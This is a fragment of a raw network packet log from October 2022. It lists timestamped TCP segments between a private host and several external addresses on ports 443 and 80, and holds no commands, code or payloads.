                                                                                                                                  Oct 17, 2022 22:07:22.873045921 CEST49715443192.168.2.5157.240.20.35
                                                                                                                                  Oct 17, 2022 22:07:22.873859882 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.873918056 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.873948097 CEST49715443192.168.2.5157.240.20.35
                                                                                                                                  Oct 17, 2022 22:07:22.873961926 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.873972893 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.874001980 CEST49715443192.168.2.5157.240.20.35
                                                                                                                                  Oct 17, 2022 22:07:22.874779940 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.874821901 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.874854088 CEST49715443192.168.2.5157.240.20.35
                                                                                                                                  Oct 17, 2022 22:07:22.874890089 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.874917984 CEST49715443192.168.2.5157.240.20.35
                                                                                                                                  Oct 17, 2022 22:07:22.875622988 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.875686884 CEST49715443192.168.2.5157.240.20.35
                                                                                                                                  Oct 17, 2022 22:07:22.875695944 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.876147985 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.876188993 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.876198053 CEST49715443192.168.2.5157.240.20.35
                                                                                                                                  Oct 17, 2022 22:07:22.876204967 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.876230001 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.876240015 CEST49715443192.168.2.5157.240.20.35
                                                                                                                                  Oct 17, 2022 22:07:22.876245975 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.876282930 CEST49715443192.168.2.5157.240.20.35
                                                                                                                                  Oct 17, 2022 22:07:22.877012968 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.877064943 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.877101898 CEST49715443192.168.2.5157.240.20.35
                                                                                                                                  Oct 17, 2022 22:07:22.877108097 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.877159119 CEST49715443192.168.2.5157.240.20.35
                                                                                                                                  Oct 17, 2022 22:07:22.877727032 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.877798080 CEST49715443192.168.2.5157.240.20.35
                                                                                                                                  Oct 17, 2022 22:07:22.877804995 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.877816916 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.877846956 CEST49715443192.168.2.5157.240.20.35
                                                                                                                                  Oct 17, 2022 22:07:22.877856970 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.877903938 CEST49715443192.168.2.5157.240.20.35
                                                                                                                                  Oct 17, 2022 22:07:22.878587961 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.878643036 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.878801107 CEST49715443192.168.2.5157.240.20.35
                                                                                                                                  Oct 17, 2022 22:07:22.878820896 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.878861904 CEST49715443192.168.2.5157.240.20.35
                                                                                                                                  Oct 17, 2022 22:07:22.879331112 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.879385948 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.879412889 CEST49715443192.168.2.5157.240.20.35
                                                                                                                                  Oct 17, 2022 22:07:22.879424095 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.879439116 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.879471064 CEST49715443192.168.2.5157.240.20.35
                                                                                                                                  Oct 17, 2022 22:07:22.879478931 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.879514933 CEST49715443192.168.2.5157.240.20.35
                                                                                                                                  Oct 17, 2022 22:07:22.880965948 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.881017923 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.881042957 CEST49715443192.168.2.5157.240.20.35
                                                                                                                                  Oct 17, 2022 22:07:22.881056070 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.881069899 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.881103992 CEST49715443192.168.2.5157.240.20.35
                                                                                                                                  Oct 17, 2022 22:07:22.881112099 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.881123066 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.881151915 CEST49715443192.168.2.5157.240.20.35
                                                                                                                                  Oct 17, 2022 22:07:22.881158113 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.881167889 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.881211996 CEST49715443192.168.2.5157.240.20.35
                                                                                                                                  Oct 17, 2022 22:07:22.881218910 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.881237030 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.881263971 CEST49715443192.168.2.5157.240.20.35
                                                                                                                                  Oct 17, 2022 22:07:22.881268978 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.881285906 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.881309986 CEST49715443192.168.2.5157.240.20.35
                                                                                                                                  Oct 17, 2022 22:07:22.881325960 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.881373882 CEST49715443192.168.2.5157.240.20.35
                                                                                                                                  Oct 17, 2022 22:07:22.881899118 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.881958961 CEST49715443192.168.2.5157.240.20.35
                                                                                                                                  Oct 17, 2022 22:07:22.882092953 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.882138968 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.882153988 CEST49715443192.168.2.5157.240.20.35
                                                                                                                                  Oct 17, 2022 22:07:22.882168055 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.882210970 CEST49715443192.168.2.5157.240.20.35
                                                                                                                                  Oct 17, 2022 22:07:22.882220030 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.882325888 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:22.882371902 CEST49715443192.168.2.5157.240.20.35
                                                                                                                                  Oct 17, 2022 22:07:22.886415958 CEST49715443192.168.2.5157.240.20.35
                                                                                                                                  Oct 17, 2022 22:07:22.908907890 CEST49715443192.168.2.5157.240.20.35
                                                                                                                                  Oct 17, 2022 22:07:23.505075932 CEST44349712162.144.15.231192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:23.505098104 CEST44349712162.144.15.231192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:23.505194902 CEST49712443192.168.2.5162.144.15.231
                                                                                                                                  Oct 17, 2022 22:07:23.581865072 CEST49715443192.168.2.5157.240.20.35
                                                                                                                                  Oct 17, 2022 22:07:23.581865072 CEST49715443192.168.2.5157.240.20.35
                                                                                                                                  Oct 17, 2022 22:07:23.581908941 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:23.581923008 CEST44349715157.240.20.35192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:23.591056108 CEST4971380192.168.2.545.136.151.102
                                                                                                                                  Oct 17, 2022 22:07:23.612104893 CEST4971780192.168.2.545.136.151.102
                                                                                                                                  Oct 17, 2022 22:07:23.733666897 CEST804971345.136.151.102192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:23.733876944 CEST4971380192.168.2.545.136.151.102
                                                                                                                                  Oct 17, 2022 22:07:23.754259109 CEST804971745.136.151.102192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:23.754420042 CEST4971780192.168.2.545.136.151.102
                                                                                                                                  Oct 17, 2022 22:07:23.757570982 CEST4971780192.168.2.545.136.151.102
                                                                                                                                  Oct 17, 2022 22:07:23.825608969 CEST44349712162.144.15.231192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:23.825644970 CEST44349712162.144.15.231192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:23.825751066 CEST49712443192.168.2.5162.144.15.231
                                                                                                                                  Oct 17, 2022 22:07:23.825808048 CEST49712443192.168.2.5162.144.15.231
                                                                                                                                  Oct 17, 2022 22:07:23.899744987 CEST804971745.136.151.102192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:23.942482948 CEST804971745.136.151.102192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:23.951872110 CEST4971780192.168.2.545.136.151.102
                                                                                                                                  Oct 17, 2022 22:07:23.951975107 CEST4971780192.168.2.545.136.151.102
                                                                                                                                  Oct 17, 2022 22:07:23.985702991 CEST44349712162.144.15.231192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:23.985811949 CEST49712443192.168.2.5162.144.15.231
                                                                                                                                  Oct 17, 2022 22:07:24.094049931 CEST804971745.136.151.102192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.094109058 CEST804971745.136.151.102192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.122827053 CEST804971745.136.151.102192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.145941019 CEST44349712162.144.15.231192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.146066904 CEST44349712162.144.15.231192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.146075010 CEST49712443192.168.2.5162.144.15.231
                                                                                                                                  Oct 17, 2022 22:07:24.146104097 CEST44349712162.144.15.231192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.146143913 CEST49712443192.168.2.5162.144.15.231
                                                                                                                                  Oct 17, 2022 22:07:24.146177053 CEST49712443192.168.2.5162.144.15.231
                                                                                                                                  Oct 17, 2022 22:07:24.146183014 CEST44349712162.144.15.231192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.146197081 CEST44349712162.144.15.231192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.146255970 CEST49712443192.168.2.5162.144.15.231
                                                                                                                                  Oct 17, 2022 22:07:24.147725105 CEST49712443192.168.2.5162.144.15.231
                                                                                                                                  Oct 17, 2022 22:07:24.147742987 CEST44349712162.144.15.231192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.147773027 CEST49712443192.168.2.5162.144.15.231
                                                                                                                                  Oct 17, 2022 22:07:24.147782087 CEST44349712162.144.15.231192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.214032888 CEST4971180192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:24.214032888 CEST4971180192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:24.241489887 CEST804971134.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.312849998 CEST4971780192.168.2.545.136.151.102
                                                                                                                                  Oct 17, 2022 22:07:24.327697992 CEST804971134.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.365895987 CEST49718443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.365995884 CEST4434971831.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.366099119 CEST49718443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.366575003 CEST49718443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.366611958 CEST4434971831.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.366924047 CEST4971180192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:24.366924047 CEST4971180192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:24.394114017 CEST804971134.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.419351101 CEST4434971831.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.419578075 CEST49718443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.440025091 CEST49718443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.440088034 CEST4434971831.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.440761089 CEST4434971831.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.441826105 CEST49718443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.441869974 CEST4434971831.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.480665922 CEST804971134.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.512083054 CEST4971180192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:24.513552904 CEST4971180192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:24.539519072 CEST804971134.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.540472984 CEST804971134.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.562594891 CEST4434971831.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.562783957 CEST4434971831.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.562973022 CEST49718443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.562983036 CEST4434971831.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.563050985 CEST49718443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.574055910 CEST49718443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.574055910 CEST49718443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.574121952 CEST4434971831.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.574151039 CEST4434971831.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.578428030 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.578517914 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.578633070 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.588946104 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.588988066 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.628086090 CEST804971134.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.633616924 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.640050888 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.640052080 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.640137911 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.640182972 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.642550945 CEST4971180192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:24.642551899 CEST4971180192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:24.670002937 CEST804971134.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.670027971 CEST804971134.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.757271051 CEST804971134.91.216.49192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.810245037 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.810364008 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.811434031 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.811530113 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.813083887 CEST4971180192.168.2.534.91.216.49
                                                                                                                                  Oct 17, 2022 22:07:24.819850922 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.819914103 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.819960117 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.820034027 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.820101976 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.820137978 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.821521997 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.821583033 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.821753025 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.821789026 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.821860075 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.827403069 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.827472925 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.827606916 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.827646971 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.827959061 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.827996016 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.828061104 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.828092098 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.828135967 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.829422951 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.829642057 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.829674006 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.836900949 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.836950064 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.837105989 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.837152004 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.837292910 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.837413073 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.837483883 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.837523937 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.837555885 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.838746071 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.838865042 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.838917017 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.839004993 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.839566946 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.839617014 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.839700937 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.839724064 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.839797020 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.840604067 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.840684891 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.840739965 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.840780020 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.840883970 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.841603994 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.841737032 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.842398882 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.842483044 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.842535973 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.842565060 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.844433069 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.844476938 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.844563007 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.844600916 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.844672918 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.845052958 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.845482111 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.845572948 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.845612049 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.846599102 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.846640110 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.846709967 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.846744061 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.846822977 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.846956015 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.846993923 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.847068071 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.847095966 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.848136902 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.854005098 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.854157925 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.854167938 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.854211092 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.854226112 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.854288101 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.854842901 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.854932070 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.854944944 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.854969025 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.855000973 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.855830908 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.855896950 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.855952978 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.855963945 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.855998993 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.856025934 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.856695890 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.856739044 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.856771946 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.856792927 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.857567072 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.857615948 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.857649088 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.857656002 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.857670069 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.857671976 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.858473063 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.858534098 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.858584881 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.858642101 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.859142065 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.859216928 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.859240055 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.859261990 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.859661102 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.859700918 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.859730005 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.859771013 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.859793901 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.859822035 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.859950066 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.860503912 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.860583067 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.860635042 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.860634089 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.860740900 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.860853910 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.861552954 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.861614943 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.861660957 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.861723900 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.861723900 CEST49719443192.168.2.531.13.92.36
                                                                                                                                  Oct 17, 2022 22:07:24.861752987 CEST4434971931.13.92.36192.168.2.5
                                                                                                                                  Oct 17, 2022 22:07:24.862212896 CEST4434971931.13.92.36192.168.2.5
